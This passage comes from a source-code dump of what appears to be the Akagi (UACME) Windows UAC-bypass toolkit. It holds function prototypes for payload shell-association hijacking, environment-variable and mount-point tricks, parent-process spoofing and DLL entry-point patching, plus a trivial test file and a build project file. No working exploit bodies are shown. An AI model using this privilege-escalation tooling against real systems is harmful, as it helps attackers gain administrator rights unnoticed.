supDebugPrint(\n    _In_ LPCWSTR ApiName,\n    _In_ DWORD status);\n\nPVOID supVirtualAlloc(\n    _Inout_ PSIZE_T Size,\n    _In_ ULONG AllocationType,\n    _In_ ULONG Protect,\n    _Out_opt_ NTSTATUS *Status);\n\nBOOL supVirtualFree(\n    _In_ PVOID Memory,\n    _Out_opt_ NTSTATUS *Status);\n\nBOOL supSecureVirtualFree(\n    _In_ PVOID Memory,\n    _In_ SIZE_T MemorySize,\n    _Out_opt_ NTSTATUS *Status);\n\nPVOID FORCEINLINE supHeapAlloc(\n    _In_ SIZE_T Size);\n\nBOOL FORCEINLINE supHeapFree(\n    _In_ PVOID Memory);\n\nBOOL supRegDeleteKeyRecursive(\n    _In_ HKEY hKeyRoot,\n    _In_ LPCWSTR lpSubKey);\n\nBOOL supSetEnvVariableEx(\n    _In_ BOOL fRemove,\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPCWSTR lpVariableName,\n    _In_opt_ LPCWSTR lpVariableData);\n\nBOOL supSetEnvVariable(\n    _In_ BOOL 
fRemove,\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPCWSTR lpVariableName,\n    _In_opt_ LPCWSTR lpVariableData);\n\nBOOL supSetEnvVariable2(\n    _In_ BOOL fRemove,\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPCWSTR lpVariableName,\n    _In_opt_ LPCWSTR lpVariableData);\n\n_Success_(return)\nBOOL supReplaceEnvironmentVariableValue(\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPWSTR lpVariableName,\n    _In_ DWORD dwType,\n    _In_opt_ LPWSTR lpVariableData,\n    _Out_opt_ PVOID* lpOldVariableData);\n\nBOOL supSetMountPoint(\n    _In_ HANDLE hDirectory,\n    _In_ LPCWSTR lpTarget,\n    _In_ LPCWSTR lpPrintName);\n\nBOOL supDeleteMountPoint(\n    _In_ HANDLE hDirectory);\n\nHANDLE supOpenDirectoryForReparse(\n    _In_ LPCWSTR lpDirectory);\n\nBOOL supWinstationToName(\n    _In_opt_ HWINSTA hWinsta,\n    _In_ LPWSTR lpBuffer,\n    _In_ DWORD cbBuffer,\n    _Out_ PDWORD BytesNeeded);\n\nBOOL supDesktopToName(\n    _In_opt_ HDESK hDesktop,\n    _In_ LPWSTR lpBuffer,\n    _In_ DWORD cbBuffer,\n    _Out_ PDWORD BytesNeeded);\n\nBOOL supReplaceDllEntryPoint(\n    _In_ PVOID DllImage,\n    _In_ ULONG SizeOfDllImage,\n    _In_ LPCSTR lpEntryPointName,\n    _In_ BOOL fConvertToExe);\n\nNTSTATUS supRegWriteValue(\n    _In_ HANDLE hKey,\n    _In_opt_ LPWSTR ValueName,\n    _In_ DWORD ValueType,\n    _In_ PVOID ValueData,\n    _In_ ULONG ValueDataSize);\n\nNTSTATUS supRegReadValue(\n    _In_ HANDLE hKey,\n    _In_ LPWSTR ValueName,\n    _In_ DWORD ValueType,\n    _Out_ PVOID *Buffer,\n    _Out_ ULONG *BufferSize,\n    _In_opt_ HANDLE hHeap);\n\nNTSTATUS supRegCurrentUserDeleteSubKeyValue(\n    _In_ LPWSTR SubKey,\n    _In_ LPWSTR ValueName);\n\nBOOL supQuerySystemRoot(\n    _Inout_ PVOID Context);\n\nPVOID supGetSystemInfo(\n    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);\n\nBOOL supIsCorImageFile(\n    _In_ PVOID ImageBase);\n\nPVOID supEncodePointer(\n    _In_ PVOID Pointer);\n\nPVOID supDecodePointer(\n    _In_ PVOID Pointer);\n\nNTSTATUS supCreateDirectory(\n    
_Out_opt_ PHANDLE phDirectory,\n    _In_ OBJECT_ATTRIBUTES *ObjectAttributes,\n    _In_ ULONG DirectoryShareFlags,\n    _In_ ULONG DirectoryAttributes);\n\nBOOL supCreateSharedParametersBlock(\n    _In_ PVOID ucmContext);\n\nVOID supDestroySharedParametersBlock(\n    _In_ PVOID ucmContext);\n\nPVOID supCreateUacmeContext(\n    _In_ ULONG Method,\n    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n    _In_ ULONG OptionalParameterLength,\n    _In_ PVOID DecompressRoutine);\n\nVOID supDestroyUacmeContext(\n    _In_ PVOID Context);\n\nNTSTATUS supEnableDisableWow64Redirection(\n    _In_ BOOL bDisable);\n\nNTSTATUS supGetProcessDebugObject(\n    _In_ HANDLE ProcessHandle,\n    _Out_ PHANDLE DebugObjectHandle);\n\nBOOL supIsProcessRunning(\n    _In_ LPWSTR ProcessName);\n\nvoid supBinTextEncode(\n    _In_ unsigned __int64 x,\n    _Inout_ wchar_t* s);\n\nVOID supGenerateSharedObjectName(\n    _In_ WORD ObjectId,\n    _Inout_ LPWSTR lpBuffer);\n\nVOID supSetGlobalCompletionEvent(\n    VOID);\n\nNTSTATUS supWaitForGlobalCompletionEvent(\n    VOID);\n\nNTSTATUS supOpenClassesKey(\n    _In_opt_ PUNICODE_STRING UserRegEntry,\n    _Out_ PHANDLE KeyHandle);\n\nNTSTATUS supRemoveRegLinkHKCU(\n    _In_ LPWSTR lpszRegLink);\n\nPVOID supFindPattern(\n    _In_ CONST PBYTE Buffer,\n    _In_ SIZE_T BufferSize,\n    _In_ CONST PBYTE Pattern,\n    _In_ SIZE_T PatternSize);\n\nPVOID supLookupImageSectionByName(\n    _In_ CHAR* SectionName,\n    _In_ ULONG SectionNameLength,\n    _In_ PVOID DllBase,\n    _Out_ PULONG SectionSize);\n\nNTSTATUS supFindUserAssocSet(\n    _Out_ USER_ASSOC_PTR* Function);\n\nPUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(\n    _Out_opt_ PULONG SignatureCount);\n\nVOID supEnumUserAssocSetDB(\n    _In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,\n    _In_opt_ PVOID Context);\n\nNTSTATUS supRegisterShellAssoc(\n    _In_ LPCWSTR pszExt,\n    _In_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc,\n    _In_ LPCWSTR lpszPayload,\n   
 _In_ BOOL fCustomURIScheme,\n    _In_opt_ LPCWSTR pszDefaultValue);\n\nNTSTATUS supUnregisterShellAssocEx(\n    _In_ BOOLEAN fResetOnly,\n    _In_ LPCWSTR pszExt,\n    _In_opt_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc);\n\nNTSTATUS supUnregisterShellAssoc(\n    _In_ LPCWSTR pszExt,\n    _In_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc);\n\nNTSTATUS supResetShellAssoc(\n    _In_ LPCWSTR pszExt,\n    _In_opt_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc);\n\nBOOL supStopTaskByName(\n    _In_ LPCWSTR TaskFolder,\n    _In_ LPCWSTR TaskName);\n\nLPWSTR supPathAddBackSlash(\n    _In_ LPWSTR lpszPath);\n\nHANDLE supOpenShellProcess(\n    _In_ ULONG dwDesiredAccess);\n\nHANDLE supRunProcessFromParent(\n    _In_ HANDLE hParentProcess,\n    _Inout_opt_ LPWSTR lpApplicationName,\n    _In_ LPWSTR lpszParameters,\n    _In_opt_ LPWSTR lpCurrentDirectory,\n    _In_ ULONG CreationFlags,\n    _In_ WORD ShowWindowFlags,\n    _Out_opt_ HANDLE* PrimaryThread);\n\nRPC_STATUS supCreateBindingHandle(\n    _In_ RPC_WSTR RpcInterfaceUuid,\n    _Out_ RPC_BINDING_HANDLE* BindingHandle);\n\nBOOL supConcatenatePaths(\n    _Inout_ LPWSTR Target,\n    _In_ LPCWSTR Path,\n    _In_ SIZE_T TargetBufferSize);\n\ntypedef BOOL(CALLBACK* pfnEnumProcessCallback)(\n    _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,\n    _In_opt_ PVOID UserContext\n    );\n\nBOOL supEnumProcessesForSession(\n    _In_ ULONG SessionId,\n    _In_ pfnEnumProcessCallback Callback,\n    _In_opt_ PVOID UserContext);\n\nBOOL supRemoveDirectoryRecursive(\n    _In_ LPCWSTR Path);\n\nVOID supEnableToastForProtocol(\n    _In_ LPCWSTR lpProtocol,\n    _In_ BOOL fEnable);\n\nULONG supWaitForChildProcesses(\n    _In_ LPCWSTR lpProcessName,\n    _In_ DWORD dwWaitMiliseconds);\n\nVOID supRaiseHardError(\n    _In_ NTSTATUS HardErrorStatus);\n\nBOOL supGetThreadTokenImpersonationLevel(\n    _In_ HANDLE ThreadHandle,\n    _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel);\n\nULONGLONG 
supGetTickCount64(\n    VOID);\n\nBOOL CALLBACK supEnumTaskhostTasksCallback(\n    _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,\n    _In_ PVOID UserContext);\n\nBOOLEAN supStartScheduledTask(\n    _In_ LPCWSTR lpTaskFolder,\n    _In_ LPCWSTR lpTaskName);\n\nBOOLEAN supReplaceVersionInfo(\n    _In_ LPCWSTR lpFileName,\n    _In_ PBYTE lpResource,\n    _In_ DWORD dwResourceSize,\n    _In_ DWORD dwKey);\n\n#ifdef _DEBUG\n#define supDbgMsg(Message)  OutputDebugString(Message)\n#else\n#define supDbgMsg(Message)  \n#endif\n\n#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)\n"
  },
  {
    "path": "Source/Akagi/tests/test.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n*  TITLE:       TEST.C\n*\n*  VERSION:     3.61\n*\n*  DATE:        22 Jun 2022\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nVOID WINAPI TestEnumDB(\n    _In_     PUSER_ASSOC_SIGNATURE Signature,\n    _In_opt_ PVOID Context,\n    _Inout_  BOOLEAN* StopEnumeration\n)\n{\n    WCHAR szBuffer[MAX_PATH + 1];\n\n    UNREFERENCED_PARAMETER(Context);\n\n    _strcpy(szBuffer, TEXT(\"\\r\\nSign->NtBuildMin: \"));\n    ultostr(Signature->NtBuildMin, _strend(szBuffer));\n    _strcat(szBuffer, TEXT(\"\\r\\n\"));\n\n    _strcat(szBuffer, TEXT(\"Sign->NtBuildMax: \"));\n    ultostr(Signature->NtBuildMax, _strend(szBuffer));\n    _strcat(szBuffer, TEXT(\"\\r\\n\"));\n\n    _strcat(szBuffer, TEXT(\"Sign->PatternsCount: \"));\n    ultostr(Signature->PatternsCount, _strend(szBuffer));\n    _strcat(szBuffer, TEXT(\"\\r\\n\"));\n\n    _strcat(szBuffer, TEXT(\"Sign->PatternsTable: 0x\"));\n    u64tohex((ULONG_PTR)Signature->PatternsTable, _strend(szBuffer));\n    _strcat(szBuffer, TEXT(\"\\r\\n------------------\"));\n\n    OutputDebugString(szBuffer);\n\n    *StopEnumeration = FALSE;\n}\n\nVOID TestEnumUAS()\n{ \n    supEnumUserAssocSetDB((PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)TestEnumDB, NULL);\n}\n\n/*\n* ucmTestRoutine\n*\n* Purpose:\n*\n* Test routine, can serve multiple purposes.\n*\n*/\nBOOL ucmTestRoutine(\n    _In_opt_ PVOID PayloadCode,\n    _In_ ULONG PayloadSize)\n{\n    UNREFERENCED_PARAMETER(PayloadCode);\n    UNREFERENCED_PARAMETER(PayloadSize);\n\n    //TestEnumUAS();\n\n    supSetGlobalCompletionEvent();\n    return TRUE;\n}\n"
  },
  {
    "path": "Source/Akagi/tests/test.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n*  TITLE:       TEST.H\n*\n*  VERSION:     3.61\n*\n*  DATE:        22 Jun 2022\n*\n*  Test unit header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef interface ITestInterface ITestInterface;\n\ntypedef HRESULT (STDMETHODCALLTYPE *MethodPfn)(\n    __RPC__in ITestInterface * This);\n\ntypedef struct ITestInterfaceVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n            __RPC__in ITestInterface * This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void **ppvObject);\n\n\n    ULONG(STDMETHODCALLTYPE *AddRef)(\n        __RPC__in ITestInterface * This);\n\n    ULONG(STDMETHODCALLTYPE *Release)(\n        __RPC__in ITestInterface * This);\n\n    MethodPfn a[200];\n\n\n/*    HRESULT(STDMETHODCALLTYPE *Method1)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method2)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method3)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method4)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method5)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method6)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method7)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method8)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method9)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE 
*Method10)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method11)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method12)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method13)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method14)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method15)(\n        __RPC__in ITestInterface * This);\n\n    HRESULT(STDMETHODCALLTYPE *Method16)(\n        __RPC__in ITestInterface * This);*/\n\n    END_INTERFACE\n\n} *PITestInterfaceVtbl;\n\ninterface ITestInterface\n{\n    CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;\n};\n\nBOOL ucmTestRoutine(\n    _In_opt_ PVOID PayloadCode, \n    _In_ ULONG PayloadSize);\n"
  },
  {
    "path": "Source/Akagi/uacme.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"DebugConsole|Win32\">\n      <Configuration>DebugConsole</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"DebugConsole|x64\">\n      <Configuration>DebugConsole</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternalConsole|Win32\">\n      <Configuration>ReleaseInternalConsole</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternalConsole|x64\">\n      <Configuration>ReleaseInternalConsole</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|Win32\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|x64\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    
<ProjectGuid>{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>uacme</RootNamespace>\n    <ProjectName>Akagi</ProjectName>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\" Label=\"Configuration\">\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"Configuration\">\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\" Label=\"Configuration\">\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup 
Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup 
Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>$(ProjectName)32</TargetName>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>$(ProjectName)32</TargetName>\n    <RunCodeAnalysis>true</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    
<OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>$(ProjectName)32Con</TargetName>\n    <RunCodeAnalysis>true</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>true</RunCodeAnalysis>\n    <PostBuildEventUseInBuild>true</PostBuildEventUseInBuild>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64Con</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>true</RunCodeAnalysis>\n    <PostBuildEventUseInBuild>true</PostBuildEventUseInBuild>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      
